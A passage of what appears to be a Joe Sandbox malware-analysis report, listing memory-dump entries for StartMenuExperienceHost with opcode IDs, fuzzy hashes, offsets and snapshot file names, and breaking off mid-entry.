                                                          • Opcode ID: 8513e25fc5f28fdd30f2a15e25cc643ecc23e485fa5e5661195462af4d449807
                                                          • Instruction ID: 749d73889029a48fe75c628fd4098ec0ec47e278af0bd8b7283bd2fe52820d55
                                                          • Opcode Fuzzy Hash: 8513e25fc5f28fdd30f2a15e25cc643ecc23e485fa5e5661195462af4d449807
                                                          • Instruction Fuzzy Hash: 19110321B0960DCFEBA8EA68C8A56B833D2EF94300F1611BDD04EC72F6DD386E518605
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abbe8e5f76c3453e861cae0774ed8e81c7ce85a8fa4ef869bb2c64f9a2527d03
                                                          • Instruction ID: 4641cdd95d0891c1fdecdc8c315af84bf679a62eec6cb9f2f3aaf3c4fb113dc9
                                                          • Opcode Fuzzy Hash: abbe8e5f76c3453e861cae0774ed8e81c7ce85a8fa4ef869bb2c64f9a2527d03
                                                          • Instruction Fuzzy Hash: 09118235A0D78D8FE712DBA898A42DD7FB0EF82610F1646F7C085DB1E6E5341A498781
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72f291e8f7cf82786745e0dd4b90ade3e4eeea95f36091c2313c516d90a35844
                                                          • Instruction ID: eb0d9a97aaf74b4918bc928718228f06c8658720640caeb51d239b797c8f6e1a
                                                          • Opcode Fuzzy Hash: 72f291e8f7cf82786745e0dd4b90ade3e4eeea95f36091c2313c516d90a35844
                                                          • Instruction Fuzzy Hash: BFF0F42BB4D1910ED709B27C60A28F87F918F5223974881F7E09E8E4E7CD0994898684
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B784000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b784000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction ID: 8ba51e5395a8b1b36b0f53c9b95a56551daa3b33e106712cb8376e5769b080ea
                                                          • Opcode Fuzzy Hash: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction Fuzzy Hash: BD019675A1CF888FD7A4DF18844572AB7E2FBA8315F114A2EA09DD3660DB30A8018B42
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0467cd6ee1088144a70b68dc02a3cfc58133e20d8a02460b49e04cf75999c977
                                                          • Instruction ID: 7d9326cd5f793b49ffe4412bfbc4e3721c75e6ca3d090e74029c01311f493075
                                                          • Opcode Fuzzy Hash: 0467cd6ee1088144a70b68dc02a3cfc58133e20d8a02460b49e04cf75999c977
                                                          • Instruction Fuzzy Hash: 3E016135A0D7898FE712DB6484A41DD7FB0EF42210F1646E7C485DB1A6E6345A498741
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a203530d34c96f193262595a2236e969ae0ddba7637c88b768344629f18fcf6a
                                                          • Instruction ID: ce330f8747804b4f4fa77d062936c714493bcfc65afad589aa2778e81dd0e567
                                                          • Opcode Fuzzy Hash: a203530d34c96f193262595a2236e969ae0ddba7637c88b768344629f18fcf6a
                                                          • Instruction Fuzzy Hash: 22F0A421B1BA4E4BF668D69804A67B87282BF98750F190235D11DC22F2DD2835418241
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction ID: c4e5703617728d7ba7fea5ee8646bd425bad09f8d07433ddbcedf704ffda3773
                                                          • Opcode Fuzzy Hash: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction Fuzzy Hash: 78F03630A1951DCEEB68EA54D8A56F873A1FF54311F1501FDD00ED32B6DD386A814A05
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5340eb465f1be2632332b662faba1890b0f3390e82b8188d8907982e352858d6
                                                          • Instruction ID: 8912e0204cc8023371e2aa6865f43643cb96ccf82467e960d6113502df15b0cb
                                                          • Opcode Fuzzy Hash: 5340eb465f1be2632332b662faba1890b0f3390e82b8188d8907982e352858d6
                                                          • Instruction Fuzzy Hash: 00F0E530B1C7880FC71A9A2958A54617BF1DF5B20534A42FFD49ACB2E3DD18AC458781
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b72fb3ee4c4874d281bf465eb206aa26e7d75ac672da61a2efb48afe050a9171
                                                          • Instruction ID: 05695ddec1e21c0b8048f6d2b8dd29233180283ad5e4f303f82c4e51e85a1511
                                                          • Opcode Fuzzy Hash: b72fb3ee4c4874d281bf465eb206aa26e7d75ac672da61a2efb48afe050a9171
                                                          • Instruction Fuzzy Hash: B3018434A0D389CFE712DBA484941DDBFF0AF02314F1542E7C445DB1A6EA345A44C741
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47859c6f58e90711ab6b06573cb1aabaa5104090df94f09857e51303ad20489a
                                                          • Instruction ID: 34858df3f288d525c2a62e97ce5cb77128045e5e55fa82da786301a9885a5a9d
                                                          • Opcode Fuzzy Hash: 47859c6f58e90711ab6b06573cb1aabaa5104090df94f09857e51303ad20489a
                                                          • Instruction Fuzzy Hash: 66E09230B09B884FC70E9A29886D5607BA1EF6611278942EFC405CB1A3DA29DC84CB41
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a018179314cd67ce9c05a12c8c6d728836e03d92886beaf26a4bf66f383ff318
                                                          • Instruction ID: 762811f1c07b93279ba39493ca447579e58ad3c125cb0ee0e92c01f8db1c4e37
                                                          • Opcode Fuzzy Hash: a018179314cd67ce9c05a12c8c6d728836e03d92886beaf26a4bf66f383ff318
                                                          • Instruction Fuzzy Hash: 68E09230B5A7854FC709AA3888695607BA1EF6710278952FFC446CB1A3DA28DC89C741
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8475a065b3c08e857988ed0829737e564aeed36e7693f0b6b3802dd43ee8f93
                                                          • Instruction ID: ffde3ff3103f15b6b858ac260600c74e1821e03faf78a67506566a7edf3cb540
                                                          • Opcode Fuzzy Hash: e8475a065b3c08e857988ed0829737e564aeed36e7693f0b6b3802dd43ee8f93
                                                          • Instruction Fuzzy Hash: D5F0A031B0D60E8FFA28AA48D4A06BC7261EB40310F1243B9D41AC31F6DE39AE128690
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b760000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction ID: d5940cba146c16b0edbbff5cba370d03bd6ce0b60e81d7c16d2ee0218abce3f2
                                                          • Opcode Fuzzy Hash: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction Fuzzy Hash: 7DF0B434A0D3068BF3549284C4603A97394DF44310F154279E90E976F2CD286E818705
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 60e02ad3df73ae645880ed4de11b2b4d95edd1e9e69e6df9f56ec2e3d91379c2
                                                          • Instruction ID: 206070f4f76dd8aec91febe2a0b093977a54fd6e0732ecad5da23d8e4b0df8d2
                                                          • Opcode Fuzzy Hash: 60e02ad3df73ae645880ed4de11b2b4d95edd1e9e69e6df9f56ec2e3d91379c2
                                                          • Instruction Fuzzy Hash: 0EE04F30A1AB844FC70A9B2888699503BB0EF6B21178A40EBD449CB1B3D62DD848C712
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0314b6be8dde890c1bbab9c0cc29e2b80965f8c3cce8f098a596a8cc3aba0eb
                                                          • Instruction ID: d5f71805f2d3b956d4049ee78b74e4c4af5d1ee39bf8f3acbeecfbc5eef2f748
                                                          • Opcode Fuzzy Hash: c0314b6be8dde890c1bbab9c0cc29e2b80965f8c3cce8f098a596a8cc3aba0eb
                                                          • Instruction Fuzzy Hash: 22E04F21A4A7C00FC30A663488698543BB1DF6721174A01D7D045CB5B3D51DDC4DC711
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9cf57cbc6f25681e89472532ded9f7eaeff93bd1b0f022a93c0a50ebe794988e
                                                          • Instruction ID: 3b0d5e8abd0ce2ca53a3bebe35a471ec98e7700fcc6ceb072126859dd7a35095
                                                          • Opcode Fuzzy Hash: 9cf57cbc6f25681e89472532ded9f7eaeff93bd1b0f022a93c0a50ebe794988e
                                                          • Instruction Fuzzy Hash: 4CE04F34A8D7804FC70A9B3888698503BB1EF5721174A80FFD045CF1B3DA2D9849C752
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                          • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                          Memory Dump Source
                                                          • Source File: 0000001D.00000002.1852908237.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_29_2_7ffd9b791000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • Opcode Fuzzy Hash: 842137b7ab4d6da4f3e07cfac0bb8a7bc72fb7f74252c5d87b4cba03eb6e7e05
                                                          • Instruction Fuzzy Hash: 18319321B4EB8E4FE7A9ABE448A96B97792EF45300F4502BAD84DC21F3DD2879448341
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c367cd8f4524cfe6772b6e8831293d894b209fcabce3df0de0ad0e1b8d47ce6f
                                                          • Instruction ID: 8357165104af68cd069f737e7dd87d55c0135ac4ac55f62979154f4d2b72d1c5
                                                          • Opcode Fuzzy Hash: c367cd8f4524cfe6772b6e8831293d894b209fcabce3df0de0ad0e1b8d47ce6f
                                                          • Instruction Fuzzy Hash: 4C316430A1964D8FDB45EBA4C8A5DB977F0FF59300F0546BAD409DB1B2DB78A540CB50
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40eaf147706e28d8ead0f634e80c5140567b46176c4b6dc2e28afe18205d7384
                                                          • Instruction ID: 6b6f7f2d33f712d1600854e3e70edd5b53cc3f95b4c7759af14f55c2f7695078
                                                          • Opcode Fuzzy Hash: 40eaf147706e28d8ead0f634e80c5140567b46176c4b6dc2e28afe18205d7384
                                                          • Instruction Fuzzy Hash: BC21A575A0D78D8FEB21DBA888A92EC7FA0EF52314F1646BBD044CB1E2DA7426458741
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76da49c2aa001fdcb0aaa8d6f4a2044e05ac30993e78f7bd20c47889fdd9d1cc
                                                          • Instruction ID: 580de899b3560bcb4d6dcb0b1066e6f3969de108e41c19e92ddba1c0cd3961c2
                                                          • Opcode Fuzzy Hash: 76da49c2aa001fdcb0aaa8d6f4a2044e05ac30993e78f7bd20c47889fdd9d1cc
                                                          • Instruction Fuzzy Hash: 83215E21B1961E4FEBB4E75888B96BC7392FF85310F1602B9E44ED72F2DE686E414740
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2899737fc1437a349c1b773400877f16d9aff1b87446b6a10630ef02bf77d1c3
                                                          • Instruction ID: ed8b81fbfc454544aa41c52268ed6d05ff75d7c6ebc28302cd610b20c8d74c36
                                                          • Opcode Fuzzy Hash: 2899737fc1437a349c1b773400877f16d9aff1b87446b6a10630ef02bf77d1c3
                                                          • Instruction Fuzzy Hash: 09115730A09A0D8FDB54DF48C494BA973E1FB69300F5142B9D04ED32B5DB74AA808B45
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d79fdf0a7b5e6cff03ce654eadb70af180b103078c32ae522b5c1918063004eb
                                                          • Instruction ID: 09f0ff9b15e4b03062e7ceaec1572c5066ce170f4539b37138cfa917da02ec6b
                                                          • Opcode Fuzzy Hash: d79fdf0a7b5e6cff03ce654eadb70af180b103078c32ae522b5c1918063004eb
                                                          • Instruction Fuzzy Hash: 4A110321B0960D4BEFA4E66884E9ABC73D2EF94740F1605BDD54EC72F2DD786A418604
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e19204ac95bd02888abdea4ea6a6191eb78db131177b2ac76db2b69c5368b821
                                                          • Instruction ID: c8df8ecfbcff56499c6b97853aa873acc4ffdb6f1501b033612ed46d14a9e47d
                                                          • Opcode Fuzzy Hash: e19204ac95bd02888abdea4ea6a6191eb78db131177b2ac76db2b69c5368b821
                                                          • Instruction Fuzzy Hash: CF117035A0D78D8FEB12DBA898A92DCBFA0EF52214F1646B7C084DB1E2E57416498781
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 38ce4ba2af7cef3c04b544350a889a9b92410f2bfbb59a38f57e296b725be526
                                                          • Instruction ID: 6a15c683ce2930e4f73db21de7f88e1dca324e4ba130fae884956e11d9e56f46
                                                          • Opcode Fuzzy Hash: 38ce4ba2af7cef3c04b544350a889a9b92410f2bfbb59a38f57e296b725be526
                                                          • Instruction Fuzzy Hash: FCF0F42BA4C2914ED709B67C74A28F87B519F1223970881FBE09E8E4E7CD1994858684
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B794000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B794000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b794000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction ID: 4ca2ef22c3e0674f3c0651991573c61e3d859df808463586b6e0e7a55980d459
                                                          • Opcode Fuzzy Hash: 907434b3550ffdfebb1013bdc3b3dd23ef2e9ff4fa53a2a6dc2b2ede005dfa3e
                                                          • Instruction Fuzzy Hash: E7019675A1DB888FD7A4DF18844572AB7E2FBA8315F114A2EE09DD3660DB30A8018B42
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56f46b79cf64b9e6aef23dadac72c4ce997f4aa46cd70d3c1cad83f03af645b0
                                                          • Instruction ID: 3f2f2090d8da6a43d7965b5c4eba903661569b89c21e4bc6bec3c5e4b9ab60da
                                                          • Opcode Fuzzy Hash: 56f46b79cf64b9e6aef23dadac72c4ce997f4aa46cd70d3c1cad83f03af645b0
                                                          • Instruction Fuzzy Hash: 3E01A135A0D7888FEB12DB6888A41DCBFB0EF42314F0646F7C084DB1E2D57416488780
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction ID: d0d5c5319233750a9222b99b807a0cf5343c0adfe0f6c11f1a1e700c5e5f32cb
                                                          • Opcode Fuzzy Hash: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction Fuzzy Hash: 87F03130B1951E8EEB64EA54D8E9AFC73A1FF54311F1602FDD10ED32B2DD786A818A04
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26eefe597a17be193e35cf7a9f013773529d44204a5abc2d6f5942d680988026
                                                          • Instruction ID: bc7429274e4d1f7fc1d46d0c93eb6e78eaa8e5b774edbf18953fa296aae15a2f
                                                          • Opcode Fuzzy Hash: 26eefe597a17be193e35cf7a9f013773529d44204a5abc2d6f5942d680988026
                                                          • Instruction Fuzzy Hash: 59018434A0D3898FEB12DB6484941DDBFF0EF02314F1542E7C444CB1A2D9745B44C741
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 469b407ab196c303f19a15199dfce49a530dd37f2a3405873e931f1e64c9c08c
                                                          • Instruction ID: b7e16339d14feb88cee687b06369b84eef3cd2fa311b05f1dcc8cdeacf9c9b9a
                                                          • Opcode Fuzzy Hash: 469b407ab196c303f19a15199dfce49a530dd37f2a3405873e931f1e64c9c08c
                                                          • Instruction Fuzzy Hash: 93E09220B09BC84FCB0E963948685607FA1EF6711178942EBC445CF1A3ED19DC88C751
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction ID: 8272ee44d0b82c16a65333f4ad0edade07e14b0f4f67f034a193085c366d0064
                                                          • Opcode Fuzzy Hash: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction Fuzzy Hash: 0EF08930A0920647F7509684C4A17E9B394EF84310F124279E90E977E2DD7C6E85CB45
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fa4ebea491e3ee0e57ac86c1e53363385212026cab51c54581ada644874dec9e
                                                          • Instruction ID: ebd9baa5999e675c6b0894c412fe5489da9d88945f0e9211f8a4172c53216b58
                                                          • Opcode Fuzzy Hash: fa4ebea491e3ee0e57ac86c1e53363385212026cab51c54581ada644874dec9e
                                                          • Instruction Fuzzy Hash: 52E04F3068D7C04FC70A973488698503FB1EF5B11178A80EFC045CF1B3D61D9849C712
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2616f3d5d680fddf4f54cde58e32ac6e0f6652a735a4c651a215ec23fbc13fb2
                                                          • Instruction ID: 13b87aa1d2ee3728858043c1b200c0e000b8a1b1fc6cee3974ed2013a7b60abd
                                                          • Opcode Fuzzy Hash: 2616f3d5d680fddf4f54cde58e32ac6e0f6652a735a4c651a215ec23fbc13fb2
                                                          • Instruction Fuzzy Hash: 60E0123054A7844FC70A9B2488A9D903FB0EF2B21178A01E7D449CF5B3D61D9C49C762
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction ID: c531f77634975bc310436c48fc837b1c1b2f4f8c5ad12992dbae50807da4d354
                                                          • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction Fuzzy Hash: 95D0A930229A4E8FDA00B778C88A8247BA0FB0F214FCA10E1E008C71B2D60888A98700
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b7a1000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec50c2690805efd610205068e9c3666e32cb9877ae0f2e6b1f388e07eedf2dd4
